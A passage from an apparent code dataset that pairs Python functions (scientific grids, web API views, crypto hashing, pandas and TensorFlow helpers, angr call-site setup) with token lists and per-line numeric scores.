"=",
"None",
"graph",
".",
"rendered_file",
"=",
"rendered",
"return",
"rendered"
] | 30.333333 | [
0.03125,
0.05405405405405406,
0.25,
0.05263157894736842,
0.07692307692307693,
0.16666666666666666,
0.025974025974025976,
0.06451612903225806,
0.08695652173913043,
0.07407407407407407,
0.058823529411764705,
0.10526315789473684
] |
def sparse_grid_from_unmasked_sparse_grid(unmasked_sparse_grid, sparse_to_unmasked_sparse):
"""Use the central arc-second coordinate of every unmasked pixelization grid's pixels and mapping between each
pixelization pixel and unmasked pixelization pixel to compute the central arc-second coordinate of every masked
pixelization grid pixel.
Parameters
-----------
unmasked_sparse_grid : ndarray
The (y,x) arc-second centre of every unmasked pixelization grid pixel.
sparse_to_unmasked_sparse : ndarray
The index mapping between every pixelization pixel and masked pixelization pixel.
"""
total_pix_pixels = sparse_to_unmasked_sparse.shape[0]
pix_grid = np.zeros((total_pix_pixels, 2))
for pixel_index in range(total_pix_pixels):
pix_grid[pixel_index, 0] = unmasked_sparse_grid[sparse_to_unmasked_sparse[pixel_index], 0]
pix_grid[pixel_index, 1] = unmasked_sparse_grid[sparse_to_unmasked_sparse[pixel_index], 1]
return pix_grid | [
"def",
"sparse_grid_from_unmasked_sparse_grid",
"(",
"unmasked_sparse_grid",
",",
"sparse_to_unmasked_sparse",
")",
":",
"total_pix_pixels",
"=",
"sparse_to_unmasked_sparse",
".",
"shape",
"[",
"0",
"]",
"pix_grid",
"=",
"np",
".",
"zeros",
"(",
"(",
"total_pix_pixels",
",",
"2",
")",
")",
"for",
"pixel_index",
"in",
"range",
"(",
"total_pix_pixels",
")",
":",
"pix_grid",
"[",
"pixel_index",
",",
"0",
"]",
"=",
"unmasked_sparse_grid",
"[",
"sparse_to_unmasked_sparse",
"[",
"pixel_index",
"]",
",",
"0",
"]",
"pix_grid",
"[",
"pixel_index",
",",
"1",
"]",
"=",
"unmasked_sparse_grid",
"[",
"sparse_to_unmasked_sparse",
"[",
"pixel_index",
"]",
",",
"1",
"]",
"return",
"pix_grid"
] | 47.095238 | [
0.02197802197802198,
0.02631578947368421,
0.02608695652173913,
0.07142857142857142,
0,
0.14285714285714285,
0.13333333333333333,
0.08823529411764706,
0.05128205128205128,
0.07692307692307693,
0.033707865168539325,
0.2857142857142857,
0.03508771929824561,
0,
0.043478260869565216,
0,
0.0425531914893617,
0.030612244897959183,
0.030612244897959183,
0,
0.10526315789473684
] |
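The explicit per-pixel loop above is equivalent to a single NumPy fancy-indexing gather (the loop form is presumably kept for JIT-compiled code paths); a small sketch of the vectorized equivalent:

import numpy as np

unmasked_sparse_grid = np.array([[0.0, 0.0], [1.0, 1.0], [2.0, 2.0]])
sparse_to_unmasked_sparse = np.array([2, 0])

# One gather replaces the loop over pixel_index.
pix_grid = unmasked_sparse_grid[sparse_to_unmasked_sparse]
print(pix_grid)   # [[2. 2.] [0. 0.]]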
def post(self, request, *args, **kwargs):
    """ Validates subscription data before creating an Outbound message
    """
    # Look up subscriber
    subscription_id = kwargs["subscription_id"]
    if Subscription.objects.filter(id=subscription_id).exists():
        status = 202
        accepted = {"accepted": True}
        store_resend_request.apply_async(args=[subscription_id])
    else:
        status = 400
        accepted = {
            "accepted": False,
            "reason": "Cannot find subscription with ID {}".format(subscription_id),
        }
    return Response(accepted, status=status) | [
"def",
"post",
"(",
"self",
",",
"request",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"# Look up subscriber",
"subscription_id",
"=",
"kwargs",
"[",
"\"subscription_id\"",
"]",
"if",
"Subscription",
".",
"objects",
".",
"filter",
"(",
"id",
"=",
"subscription_id",
")",
".",
"exists",
"(",
")",
":",
"status",
"=",
"202",
"accepted",
"=",
"{",
"\"accepted\"",
":",
"True",
"}",
"store_resend_request",
".",
"apply_async",
"(",
"args",
"=",
"[",
"subscription_id",
"]",
")",
"else",
":",
"status",
"=",
"400",
"accepted",
"=",
"{",
"\"accepted\"",
":",
"False",
",",
"\"reason\"",
":",
"\"Cannot find subscription with ID {}\"",
".",
"format",
"(",
"subscription_id",
")",
",",
"}",
"return",
"Response",
"(",
"accepted",
",",
"status",
"=",
"status",
")"
] | 40.5 | [
0.024390243902439025,
0.027777777777777776,
0.18181818181818182,
0.07142857142857142,
0.0392156862745098,
0.029411764705882353,
0.08333333333333333,
0.04878048780487805,
0.029411764705882353,
0.15384615384615385,
0.08333333333333333,
0.125,
0.058823529411764705,
0.03409090909090909,
0.23076923076923078,
0.041666666666666664
] |
def _post(self, *args, **kwargs):
    """
    Make a POST request.
    """
    data = self._default_data()
    data.update(kwargs.get('data') or {})
    kwargs['data'] = data
    return self._request(requests.post, *args, **kwargs) | [
"def",
"_post",
"(",
"self",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"data",
"=",
"self",
".",
"_default_data",
"(",
")",
"data",
".",
"update",
"(",
"kwargs",
".",
"get",
"(",
"'data'",
")",
"or",
"{",
"}",
")",
"kwargs",
"[",
"'data'",
"]",
"=",
"data",
"return",
"self",
".",
"_request",
"(",
"requests",
".",
"post",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")"
] | 31.5 | [
0.030303030303030304,
0.18181818181818182,
0.07142857142857142,
0.18181818181818182,
0.05714285714285714,
0.044444444444444446,
0.06896551724137931,
0.03333333333333333
] |
def AsDict(self, dt=True):
    """
    A dict representation of this Shake instance.

    The return value uses the same key names as the JSON representation.

    Args:
        dt (bool): If True, return dates as python datetime objects. If
            False, return dates as ISO strings.

    Return:
        A dict representing this Shake instance
    """
    data = {}
    if self.sharekey:
        data['sharekey'] = self.sharekey
    if self.name:
        data['name'] = self.name
    if self.user:
        data['user'] = self.user.AsDict()
    if self.title:
        data['title'] = self.title
    if self.description:
        data['description'] = self.description
    if self.posted_at:
        if dt:
            data['posted_at'] = self.posted_at
        else:
            data['posted_at'] = self.posted_at_iso
    if self.permalink:
        data['permalink'] = self.permalink
    if self.width:
        data['width'] = self.width
    if self.height:
        data['height'] = self.height
    if self.image_url:
        data['image_url'] = self.image_url
    if self.source_url:
        data['source_url'] = self.source_url
    data['views'] = self.views
    data['likes'] = self.likes
    data['saves'] = self.saves
    data['comments'] = self.comments
    data['nsfw'] = self.nsfw
    data['saved'] = self.saved
    data['liked'] = self.liked
    return data | [
"def",
"AsDict",
"(",
"self",
",",
"dt",
"=",
"True",
")",
":",
"data",
"=",
"{",
"}",
"if",
"self",
".",
"sharekey",
":",
"data",
"[",
"'sharekey'",
"]",
"=",
"self",
".",
"sharekey",
"if",
"self",
".",
"name",
":",
"data",
"[",
"'name'",
"]",
"=",
"self",
".",
"name",
"if",
"self",
".",
"user",
":",
"data",
"[",
"'user'",
"]",
"=",
"self",
".",
"user",
".",
"AsDict",
"(",
")",
"if",
"self",
".",
"title",
":",
"data",
"[",
"'title'",
"]",
"=",
"self",
".",
"title",
"if",
"self",
".",
"description",
":",
"data",
"[",
"'description'",
"]",
"=",
"self",
".",
"description",
"if",
"self",
".",
"posted_at",
":",
"if",
"dt",
":",
"data",
"[",
"'posted_at'",
"]",
"=",
"self",
".",
"posted_at",
"else",
":",
"data",
"[",
"'posted_at'",
"]",
"=",
"self",
".",
"posted_at_iso",
"if",
"self",
".",
"permalink",
":",
"data",
"[",
"'permalink'",
"]",
"=",
"self",
".",
"permalink",
"if",
"self",
".",
"width",
":",
"data",
"[",
"'width'",
"]",
"=",
"self",
".",
"width",
"if",
"self",
".",
"height",
":",
"data",
"[",
"'height'",
"]",
"=",
"self",
".",
"height",
"if",
"self",
".",
"image_url",
":",
"data",
"[",
"'image_url'",
"]",
"=",
"self",
".",
"image_url",
"if",
"self",
".",
"source_url",
":",
"data",
"[",
"'source_url'",
"]",
"=",
"self",
".",
"source_url",
"data",
"[",
"'views'",
"]",
"=",
"self",
".",
"views",
"data",
"[",
"'likes'",
"]",
"=",
"self",
".",
"likes",
"data",
"[",
"'saves'",
"]",
"=",
"self",
".",
"saves",
"data",
"[",
"'comments'",
"]",
"=",
"self",
".",
"comments",
"data",
"[",
"'nsfw'",
"]",
"=",
"self",
".",
"nsfw",
"data",
"[",
"'saved'",
"]",
"=",
"self",
".",
"saved",
"data",
"[",
"'liked'",
"]",
"=",
"self",
".",
"liked",
"return",
"data"
] | 30.510204 | [
0.038461538461538464,
0.18181818181818182,
0.03773584905660377,
0,
0.02631578947368421,
0,
0.15384615384615385,
0.04,
0.0392156862745098,
0,
0.13333333333333333,
0.061224489795918366,
0.18181818181818182,
0.11764705882352941,
0,
0.08,
0.045454545454545456,
0.09523809523809523,
0.05555555555555555,
0.09523809523809523,
0.044444444444444446,
0.09090909090909091,
0.05263157894736842,
0.07142857142857142,
0.04,
0.07692307692307693,
0.1111111111111111,
0.04,
0.11764705882352941,
0.037037037037037035,
0.07692307692307693,
0.043478260869565216,
0.09090909090909091,
0.05263157894736842,
0.08695652173913043,
0.05,
0.07692307692307693,
0.043478260869565216,
0.07407407407407407,
0.041666666666666664,
0.058823529411764705,
0.058823529411764705,
0.058823529411764705,
0.05,
0.0625,
0.058823529411764705,
0.058823529411764705,
0,
0.10526315789473684
] |
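The repeated if-blocks above all implement "include the key only when the attribute is truthy". A hedged sketch of the same pattern with a field loop (field names taken from the method above; user and posted_at are omitted because they need special handling):

def as_dict_sketch(obj):
    data = {}
    for field in ("sharekey", "name", "title", "description", "permalink",
                  "width", "height", "image_url", "source_url"):
        value = getattr(obj, field, None)
        if value:                 # skip falsy/unset fields, as in AsDict
            data[field] = value
    return data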
def do_init(self, fs_settings, global_quota):
    fs_settings = deepcopy(fs_settings)  # because we store some of the info, we need a deep copy
    '''
    If the same restrictions are applied for many destinations, we use the same job to avoid processing
    files twice
    '''
    for sender_spec in fs_settings.sender_specs:
        restrictions = sender_spec.restrictions
        if restrictions in self.restriction_to_job:
            self.restriction_to_job[restrictions].add_destinations(sender_spec.destinations)
        else:
            compressor = _CompressorJob(
                next_task=self.get_next_task(),
                sender_spec=sender_spec,
                tmp_file_parts_basepath=fs_settings.tmp_file_parts_basepath,
                should_split_small_files=fs_settings.should_split_small_files,
                global_quota=global_quota)
            self.restriction_to_job[restrictions] = compressor
            compressor.register(self) | [
"def",
"do_init",
"(",
"self",
",",
"fs_settings",
",",
"global_quota",
")",
":",
"fs_settings",
"=",
"deepcopy",
"(",
"fs_settings",
")",
"# because we store some of the info, we need a deep copy",
"for",
"sender_spec",
"in",
"fs_settings",
".",
"sender_specs",
":",
"restrictions",
"=",
"sender_spec",
".",
"restrictions",
"if",
"restrictions",
"in",
"self",
".",
"restriction_to_job",
":",
"self",
".",
"restriction_to_job",
"[",
"restrictions",
"]",
".",
"add_destinations",
"(",
"sender_spec",
".",
"destinations",
")",
"else",
":",
"compressor",
"=",
"_CompressorJob",
"(",
"next_task",
"=",
"self",
".",
"get_next_task",
"(",
")",
",",
"sender_spec",
"=",
"sender_spec",
",",
"tmp_file_parts_basepath",
"=",
"fs_settings",
".",
"tmp_file_parts_basepath",
",",
"should_split_small_files",
"=",
"fs_settings",
".",
"should_split_small_files",
",",
"global_quota",
"=",
"global_quota",
")",
"self",
".",
"restriction_to_job",
"[",
"restrictions",
"]",
"=",
"compressor",
"compressor",
".",
"register",
"(",
"self",
")"
] | 53.631579 | [
0.022222222222222223,
0.0297029702970297,
0.18181818181818182,
0.028037383177570093,
0.10526315789473684,
0.18181818181818182,
0.038461538461538464,
0.0392156862745098,
0.03636363636363636,
0.03125,
0.11764705882352941,
0.06818181818181818,
0.058823529411764705,
0.06818181818181818,
0.05,
0.04878048780487805,
0.08695652173913043,
0.030303030303030304,
0.04878048780487805
] |
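The restriction_to_job dictionary deduplicates work: sender specs with identical restrictions share one compressor job, and only their destinations accumulate. The same idea in miniature, with a hypothetical Spec tuple:

from collections import namedtuple

Spec = namedtuple("Spec", "restrictions destinations")
specs = [Spec("small", ["a"]), Spec("small", ["b"]), Spec("any", ["c"])]

jobs = {}   # one entry per distinct restriction set
for spec in specs:
    jobs.setdefault(spec.restrictions, []).extend(spec.destinations)
print(jobs)   # {'small': ['a', 'b'], 'any': ['c']}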
def inputAnalyzeCallback(self, *args, **kwargs):
    """
    Test method for inputAnalyzeCallback

    This method loops over the passed number of files,
    and optionally "delays" in each loop to simulate
    some analysis. The delay length is specified by
    the '--test <delay>' flag.
    """
    b_status = False
    filesRead = 0
    filesAnalyzed = 0
    for k, v in kwargs.items():
        if k == 'filesRead': d_DCMRead = v
        if k == 'path': str_path = v
    if len(args):
        at_data = args[0]
        str_path = at_data[0]
        d_read = at_data[1]
    b_status = True
    self.dp.qprint("analyzing:\n%s" %
                   self.pp.pformat(d_read['l_file']),
                   level = 5)
    if int(self.f_sleepLength):
        self.dp.qprint("sleeping for: %f" % self.f_sleepLength, level = 5)
        time.sleep(self.f_sleepLength)
    filesAnalyzed = len(d_read['l_file'])
    return {
        'status': b_status,
        'filesAnalyzed': filesAnalyzed,
        'l_file': d_read['l_file']
    } | [
"def",
"inputAnalyzeCallback",
"(",
"self",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"b_status",
"=",
"False",
"filesRead",
"=",
"0",
"filesAnalyzed",
"=",
"0",
"for",
"k",
",",
"v",
"in",
"kwargs",
".",
"items",
"(",
")",
":",
"if",
"k",
"==",
"'filesRead'",
":",
"d_DCMRead",
"=",
"v",
"if",
"k",
"==",
"'path'",
":",
"str_path",
"=",
"v",
"if",
"len",
"(",
"args",
")",
":",
"at_data",
"=",
"args",
"[",
"0",
"]",
"str_path",
"=",
"at_data",
"[",
"0",
"]",
"d_read",
"=",
"at_data",
"[",
"1",
"]",
"b_status",
"=",
"True",
"self",
".",
"dp",
".",
"qprint",
"(",
"\"analyzing:\\n%s\"",
"%",
"self",
".",
"pp",
".",
"pformat",
"(",
"d_read",
"[",
"'l_file'",
"]",
")",
",",
"level",
"=",
"5",
")",
"if",
"int",
"(",
"self",
".",
"f_sleepLength",
")",
":",
"self",
".",
"dp",
".",
"qprint",
"(",
"\"sleeping for: %f\"",
"%",
"self",
".",
"f_sleepLength",
",",
"level",
"=",
"5",
")",
"time",
".",
"sleep",
"(",
"self",
".",
"f_sleepLength",
")",
"filesAnalyzed",
"=",
"len",
"(",
"d_read",
"[",
"'l_file'",
"]",
")",
"return",
"{",
"'status'",
":",
"b_status",
",",
"'filesAnalyzed'",
":",
"filesAnalyzed",
",",
"'l_file'",
":",
"d_read",
"[",
"'l_file'",
"]",
"}"
] | 33.297297 | [
0.020833333333333332,
0.18181818181818182,
0.046511627906976744,
0,
0.05084745762711865,
0.03571428571428571,
0.03636363636363636,
0.058823529411764705,
0,
0.18181818181818182,
0.08571428571428572,
0.0967741935483871,
0.0967741935483871,
0,
0.05714285714285714,
0.0784313725490196,
0.0784313725490196,
0,
0.09523809523809523,
0.08108108108108109,
0.075,
0.075,
0,
0.1,
0.09523809523809523,
0.04477611940298507,
0.07142857142857142,
0.05714285714285714,
0.05128205128205128,
0.047619047619047616,
0.06382978723404255,
0,
0.1875,
0.04878048780487805,
0.043478260869565216,
0.041666666666666664,
0.3333333333333333
] |
def crypto_shorthash_siphashx24(data, key):
    """Compute a fast, cryptographic quality, keyed hash of the input data

    :param data:
    :type data: bytes
    :param key: len(key) must be equal to
                :py:data:`.XKEYBYTES` (16)
    :type key: bytes
    """
    if len(key) != XKEYBYTES:
        raise exc.ValueError(
            "Key length must be exactly {0} bytes".format(XKEYBYTES))
    digest = ffi.new("unsigned char[]", XBYTES)
    rc = lib.crypto_shorthash_siphashx24(digest, data, len(data), key)
    ensure(rc == 0, raising=exc.RuntimeError)
    return ffi.buffer(digest, XBYTES)[:] | [
"def",
"crypto_shorthash_siphashx24",
"(",
"data",
",",
"key",
")",
":",
"if",
"len",
"(",
"key",
")",
"!=",
"XKEYBYTES",
":",
"raise",
"exc",
".",
"ValueError",
"(",
"\"Key length must be exactly {0} bytes\"",
".",
"format",
"(",
"XKEYBYTES",
")",
")",
"digest",
"=",
"ffi",
".",
"new",
"(",
"\"unsigned char[]\"",
",",
"XBYTES",
")",
"rc",
"=",
"lib",
".",
"crypto_shorthash_siphashx24",
"(",
"digest",
",",
"data",
",",
"len",
"(",
"data",
")",
",",
"key",
")",
"ensure",
"(",
"rc",
"==",
"0",
",",
"raising",
"=",
"exc",
".",
"RuntimeError",
")",
"return",
"ffi",
".",
"buffer",
"(",
"digest",
",",
"XBYTES",
")",
"[",
":",
"]"
] | 34.882353 | [
0.023255813953488372,
0.02702702702702703,
0,
0.1875,
0.14285714285714285,
0.07317073170731707,
0.14285714285714285,
0.15,
0.2857142857142857,
0.06896551724137931,
0.10344827586206896,
0.043478260869565216,
0.0425531914893617,
0.02857142857142857,
0,
0.044444444444444446,
0.05
] |
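Assuming this is PyNaCl's nacl.bindings module (where XKEYBYTES and XBYTES are both 16 for SipHashX-2-4), usage looks like:

from nacl.bindings import crypto_shorthash_siphashx24

key = b"0123456789abcdef"          # must be exactly 16 bytes
tag = crypto_shorthash_siphashx24(b"payload", key)
assert len(tag) == 16              # 16-byte SipHashX-2-4 digest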
def parse_copy_object(bucket_name, object_name, data):
    """
    Parser for copy object response.

    :param data: Response data for copy object.
    :return: :class:`CopyObjectResult <CopyObjectResult>`
    """
    root = S3Element.fromstring('CopyObjectResult', data)
    return CopyObjectResult(
        bucket_name, object_name,
        root.get_etag_elem(),
        root.get_localized_time_elem('LastModified')
    ) | [
"def",
"parse_copy_object",
"(",
"bucket_name",
",",
"object_name",
",",
"data",
")",
":",
"root",
"=",
"S3Element",
".",
"fromstring",
"(",
"'CopyObjectResult'",
",",
"data",
")",
"return",
"CopyObjectResult",
"(",
"bucket_name",
",",
"object_name",
",",
"root",
".",
"get_etag_elem",
"(",
")",
",",
"root",
".",
"get_localized_time_elem",
"(",
"'LastModified'",
")",
")"
] | 29.428571 | [
0.018518518518518517,
0.2857142857142857,
0.05555555555555555,
0,
0.06382978723404255,
0.15789473684210525,
0.2857142857142857,
0.03508771929824561,
0,
0.10714285714285714,
0.06060606060606061,
0.06896551724137931,
0.038461538461538464,
0.6
] |
def to_pandas(self):
    """Convert to pandas MultiIndex.

    Returns
    -------
    pandas.base.MultiIndex
    """
    if not all(ind.is_raw() for ind in self.values):
        raise ValueError('Cannot convert to pandas MultiIndex if not evaluated.')

    from pandas import MultiIndex as PandasMultiIndex
    arrays = [ind.values for ind in self.values]
    return PandasMultiIndex.from_arrays(arrays, names=self.names) | [
"def",
"to_pandas",
"(",
"self",
")",
":",
"if",
"not",
"all",
"(",
"ind",
".",
"is_raw",
"(",
")",
"for",
"ind",
"in",
"self",
".",
"values",
")",
":",
"raise",
"ValueError",
"(",
"'Cannot convert to pandas MultiIndex if not evaluated.'",
")",
"from",
"pandas",
"import",
"MultiIndex",
"as",
"PandasMultiIndex",
"arrays",
"=",
"[",
"ind",
".",
"values",
"for",
"ind",
"in",
"self",
".",
"values",
"]",
"return",
"PandasMultiIndex",
".",
"from_arrays",
"(",
"arrays",
",",
"names",
"=",
"self",
".",
"names",
")"
] | 28.125 | [
0.05,
0.05,
0,
0.13333333333333333,
0.13333333333333333,
0.06666666666666667,
0,
0.18181818181818182,
0.03571428571428571,
0.03529411764705882,
0,
0.03508771929824561,
0,
0.038461538461538464,
0,
0.028985507246376812
] |
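The conversion bottoms out in pandas.MultiIndex.from_arrays: one array per index level plus the level names. A standalone illustration of the target structure:

import pandas as pd

arrays = [[1, 1, 2, 2], ["a", "b", "a", "b"]]
idx = pd.MultiIndex.from_arrays(arrays, names=["num", "letter"])
print(idx.names)   # the two level names
print(idx[0])      # (1, 'a'), one tuple per row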
def fixup_scipy_ndimage_result(whatever_it_returned):
    """Convert a result from scipy.ndimage to a numpy array

    scipy.ndimage has the annoying habit of returning a single, bare
    value instead of an array if the indexes passed in are of length 1.
    For instance:
    scind.maximum(image, labels, [1]) returns a float
    but
    scind.maximum(image, labels, [1,2]) returns a list
    """
    if getattr(whatever_it_returned, "__getitem__", False):
        return np.array(whatever_it_returned)
    else:
        return np.array([whatever_it_returned]) | [
"def",
"fixup_scipy_ndimage_result",
"(",
"whatever_it_returned",
")",
":",
"if",
"getattr",
"(",
"whatever_it_returned",
",",
"\"__getitem__\"",
",",
"False",
")",
":",
"return",
"np",
".",
"array",
"(",
"whatever_it_returned",
")",
"else",
":",
"return",
"np",
".",
"array",
"(",
"[",
"whatever_it_returned",
"]",
")"
] | 39.357143 | [
0.018867924528301886,
0.03389830508474576,
0.5,
0.029411764705882353,
0.028169014084507043,
0.11764705882352941,
0.03773584905660377,
0.2857142857142857,
0.05555555555555555,
0.2857142857142857,
0.07017543859649122,
0.044444444444444446,
0.2222222222222222,
0.0425531914893617
] |
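Assuming the helper above is in scope, its normalization can be seen directly; whether a length-1 index comes back bare or wrapped depends on the SciPy version, which is exactly why the helper checks for __getitem__ instead of a type:

import numpy as np
import scipy.ndimage as scind

image = np.array([[1.0, 2.0], [3.0, 4.0]])
labels = np.array([[1, 1], [2, 2]])

result = scind.maximum(image, labels, [1])   # may be a bare float
print(fixup_scipy_ndimage_result(result))    # always an ndarray
print(fixup_scipy_ndimage_result(scind.maximum(image, labels, [1, 2])))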
def get_message(self, message_id, *args, **kwargs):
    """Return a Message object corresponding to the given ID.

    :param message_id: The ID or Fullname for a Message

    The additional parameters are passed directly into
    :meth:`~praw.objects.Message.from_id` of Message, and subsequently into
    :meth:`.request_json`.
    """
    return objects.Message.from_id(self, message_id, *args, **kwargs) | [
"def",
"get_message",
"(",
"self",
",",
"message_id",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"return",
"objects",
".",
"Message",
".",
"from_id",
"(",
"self",
",",
"message_id",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")"
] | 38.727273 | [
0.0196078431372549,
0.03076923076923077,
0,
0.05084745762711865,
0,
0.034482758620689655,
0.06329113924050633,
0.16666666666666666,
0,
0.18181818181818182,
0.0273972602739726
] |
def argmax_with_score(logits, axis=None):
    """Argmax along with the value."""
    axis = axis or len(logits.get_shape()) - 1
    predictions = tf.argmax(logits, axis=axis)

    logits_shape = shape_list(logits)
    prefix_shape, vocab_size = logits_shape[:-1], logits_shape[-1]
    prefix_size = 1
    for d in prefix_shape:
        prefix_size *= d

    # Flatten to extract scores
    flat_logits = tf.reshape(logits, [prefix_size, vocab_size])
    flat_predictions = tf.reshape(predictions, [prefix_size])
    flat_indices = tf.stack(
        [tf.range(tf.to_int64(prefix_size)),
         tf.to_int64(flat_predictions)],
        axis=1)
    flat_scores = tf.gather_nd(flat_logits, flat_indices)

    # Unflatten
    scores = tf.reshape(flat_scores, prefix_shape)

    return predictions, scores | [
"def",
"argmax_with_score",
"(",
"logits",
",",
"axis",
"=",
"None",
")",
":",
"axis",
"=",
"axis",
"or",
"len",
"(",
"logits",
".",
"get_shape",
"(",
")",
")",
"-",
"1",
"predictions",
"=",
"tf",
".",
"argmax",
"(",
"logits",
",",
"axis",
"=",
"axis",
")",
"logits_shape",
"=",
"shape_list",
"(",
"logits",
")",
"prefix_shape",
",",
"vocab_size",
"=",
"logits_shape",
"[",
":",
"-",
"1",
"]",
",",
"logits_shape",
"[",
"-",
"1",
"]",
"prefix_size",
"=",
"1",
"for",
"d",
"in",
"prefix_shape",
":",
"prefix_size",
"*=",
"d",
"# Flatten to extract scores",
"flat_logits",
"=",
"tf",
".",
"reshape",
"(",
"logits",
",",
"[",
"prefix_size",
",",
"vocab_size",
"]",
")",
"flat_predictions",
"=",
"tf",
".",
"reshape",
"(",
"predictions",
",",
"[",
"prefix_size",
"]",
")",
"flat_indices",
"=",
"tf",
".",
"stack",
"(",
"[",
"tf",
".",
"range",
"(",
"tf",
".",
"to_int64",
"(",
"prefix_size",
")",
")",
",",
"tf",
".",
"to_int64",
"(",
"flat_predictions",
")",
"]",
",",
"axis",
"=",
"1",
")",
"flat_scores",
"=",
"tf",
".",
"gather_nd",
"(",
"flat_logits",
",",
"flat_indices",
")",
"# Unflatten",
"scores",
"=",
"tf",
".",
"reshape",
"(",
"flat_scores",
",",
"prefix_shape",
")",
"return",
"predictions",
",",
"scores"
] | 30.708333 | [
0.024390243902439025,
0.08333333333333333,
0.06818181818181818,
0.06818181818181818,
0,
0.08571428571428572,
0.046875,
0.17647058823529413,
0.125,
0.1,
0,
0.10344827586206896,
0.04918032786885246,
0.05084745762711865,
0.15384615384615385,
0.09523809523809523,
0.10526315789473684,
0.38461538461538464,
0.05454545454545454,
0,
0.23076923076923078,
0.0625,
0,
0.10714285714285714
] |
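The flatten/gather_nd dance exists because this era of TensorFlow had no direct "value at the argmax" gather. In NumPy the same result is a single take_along_axis call, shown here as a reference for what the function computes:

import numpy as np

logits = np.array([[0.1, 2.0, 0.3],
                   [1.5, 0.2, 0.9]])
predictions = np.argmax(logits, axis=-1)
scores = np.take_along_axis(logits, predictions[..., None], axis=-1)[..., 0]
print(predictions)   # [1 0]
print(scores)        # [2.  1.5]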
def destroy(self, uuid):
    """
    Destroy a kvm domain by uuid

    :param uuid: uuid of the kvm container (same as the one used in create)
    :return:
    """
    args = {
        'uuid': uuid,
    }
    self._domain_action_chk.check(args)

    self._client.sync('kvm.destroy', args) | [
"def",
"destroy",
"(",
"self",
",",
"uuid",
")",
":",
"args",
"=",
"{",
"'uuid'",
":",
"uuid",
",",
"}",
"self",
".",
"_domain_action_chk",
".",
"check",
"(",
"args",
")",
"self",
".",
"_client",
".",
"sync",
"(",
"'kvm.destroy'",
",",
"args",
")"
] | 26 | [
0.041666666666666664,
0.18181818181818182,
0.05555555555555555,
0.05333333333333334,
0.1875,
0.18181818181818182,
0.1875,
0.08,
0.3333333333333333,
0.046511627906976744,
0,
0.043478260869565216
] |
def setup_callsite(self, state, ret_addr, args, stack_base=None, alloc_base=None, grow_like_stack=True):
    """
    This function performs the actions of the caller getting ready to jump into a function.

    :param state:           The SimState to operate on
    :param ret_addr:        The address to return to when the called function finishes
    :param args:            The list of arguments that the called function will see
    :param stack_base:      An optional pointer to use as the top of the stack, circa the function entry point
    :param alloc_base:      An optional pointer to use as the place to put excess argument data
    :param grow_like_stack: When allocating data at alloc_base, whether to allocate at decreasing addresses

    The idea here is that you can provide almost any kind of python type in `args` and it'll be translated to a
    binary format to be placed into simulated memory. Lists (representing arrays) must be entirely elements of the
    same type and size, while tuples (representing structs) can be elements of any type and size.
    If you'd like there to be a pointer to a given value, wrap the value in a `PointerWrapper`. Any value
    that can't fit in a register will be automatically put in a PointerWrapper.

    If stack_base is not provided, the current stack pointer will be used, and it will be updated.
    If alloc_base is not provided, the stack base will be used and grow_like_stack will implicitly be True.

    grow_like_stack controls the behavior of allocating data at alloc_base. When data from args needs to be wrapped
    in a pointer, the pointer needs to point somewhere, so that data is dumped into memory at alloc_base. If you
    set alloc_base to point to somewhere other than the stack, set grow_like_stack to False so that sequential
    allocations happen at increasing addresses.
    """
    # STEP 0: clerical work
    if isinstance(self, SimCCSoot):
        SimEngineSoot.setup_callsite(state, args, ret_addr)
        return

    allocator = AllocHelper(self.arch.bits, self.arch.memory_endness == 'Iend_LE')

    #
    # STEP 1: convert all values into serialized form
    # this entails creating the vals list of simple values to store and also populating the allocator's
    # understanding of what aux data needs to be stored
    # This is also where we compute arg locations (arg_locs)
    #
    if self.func_ty is not None:
        vals = [self._standardize_value(arg, ty, state, allocator.dump) for arg, ty in zip(args, self.func_ty.args)]
    else:
        vals = [self._standardize_value(arg, None, state, allocator.dump) for arg in args]

    arg_session = self.arg_session
    arg_locs = [None]*len(args)
    for i, (arg, val) in enumerate(zip(args, vals)):
        if self.is_fp_value(arg) or \
                (self.func_ty is not None and isinstance(self.func_ty.args[i], SimTypeFloat)):
            arg_locs[i] = arg_session.next_arg(is_fp=True, size=val.length // state.arch.byte_width)
            continue
        if val.length > state.arch.bits or (self.func_ty is None and isinstance(arg, (bytes, str, list, tuple))):
            vals[i] = allocator.dump(val, state)
        elif val.length < state.arch.bits:
            if self.arch.memory_endness == 'Iend_LE':
                vals[i] = val.concat(claripy.BVV(0, state.arch.bits - val.length))
            else:
                vals[i] = claripy.BVV(0, state.arch.bits - val.length).concat(val)
        arg_locs[i] = arg_session.next_arg(is_fp=False, size=vals[i].length // state.arch.byte_width)

    #
    # STEP 2: decide on memory storage locations
    # implement the contract for stack_base/alloc_base/grow_like_stack
    # after this, stack_base should be the final stack pointer, alloc_base should be the final aux storage location,
    # and the stack pointer should be updated
    #
    if stack_base is None:
        if alloc_base is None:
            alloc_size = allocator.size()
            state.regs.sp -= alloc_size
            alloc_base = state.regs.sp
            grow_like_stack = False

        state.regs.sp -= self.stack_space(arg_locs)

        # handle alignment
        alignment = (state.regs.sp + self.STACKARG_SP_DIFF) % self.STACK_ALIGNMENT
        state.regs.sp -= alignment
    else:
        state.regs.sp = stack_base

        if alloc_base is None:
            alloc_base = stack_base + self.stack_space(arg_locs)
            grow_like_stack = False

    if grow_like_stack:
        alloc_base -= allocator.size()
    if type(alloc_base) is int:
        alloc_base = claripy.BVV(alloc_base, state.arch.bits)

    for i, val in enumerate(vals):
        vals[i] = allocator.translate(val, alloc_base)

    #
    # STEP 3: store everything!
    #
    allocator.apply(state, alloc_base)
    for loc, val in zip(arg_locs, vals):
        if val.length > loc.size * 8:
            raise ValueError("Can't fit value {} into location {}".format(repr(val), repr(loc)))
        loc.set_value(state, val, endness='Iend_BE', stack_base=stack_base)
    self.return_addr.set_value(state, ret_addr, stack_base=stack_base) | [
"def",
"setup_callsite",
"(",
"self",
",",
"state",
",",
"ret_addr",
",",
"args",
",",
"stack_base",
"=",
"None",
",",
"alloc_base",
"=",
"None",
",",
"grow_like_stack",
"=",
"True",
")",
":",
"# STEP 0: clerical work",
"if",
"isinstance",
"(",
"self",
",",
"SimCCSoot",
")",
":",
"SimEngineSoot",
".",
"setup_callsite",
"(",
"state",
",",
"args",
",",
"ret_addr",
